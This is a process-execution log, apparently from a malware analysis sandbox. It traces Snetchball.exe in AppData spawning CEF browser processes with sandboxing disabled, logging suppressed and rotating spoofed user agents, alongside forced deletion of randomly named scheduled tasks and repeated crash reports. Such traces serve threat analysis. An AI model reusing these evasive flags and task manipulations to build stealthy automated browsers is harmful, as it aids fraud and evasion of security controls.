"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3752 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1208 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=1832 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FACte1"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5860 -ip 5860
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 784 -ip 784
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 2456
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaService --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=5836 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6272 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6876 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7124 /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4068 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2820 --field-trial-handle=2824,i,497458667817038521,11437422347205369093,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3112 --field-trial-handle=2824,i,497458667817038521,11437422347205369093,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2824,i,497458667817038521,11437422347205369093,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=2824,i,497458667817038521,11437422347205369093,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=2824,i,497458667817038521,11437422347205369093,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1648
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1700
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,13347904878381795943,16359504085142499565,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5972 /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2876 --field-trial-handle=2880,i,11934877195413615712,15507049701759003266,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3124 --field-trial-handle=2880,i,11934877195413615712,15507049701759003266,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3176 --field-trial-handle=2880,i,11934877195413615712,15507049701759003266,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3252 --field-trial-handle=2880,i,11934877195413615712,15507049701759003266,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3424 --field-trial-handle=2880,i,11934877195413615712,15507049701759003266,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2796 --field-trial-handle=2800,i,9257376146485230935,3735557170804219864,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2940 --field-trial-handle=2800,i,9257376146485230935,3735557170804219864,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2952 --field-trial-handle=2800,i,9257376146485230935,3735557170804219864,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3120 --field-trial-handle=2800,i,9257376146485230935,3735557170804219864,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3132 --field-trial-handle=2800,i,9257376146485230935,3735557170804219864,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4148 --field-trial-handle=2800,i,9257376146485230935,3735557170804219864,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1224
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1844
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
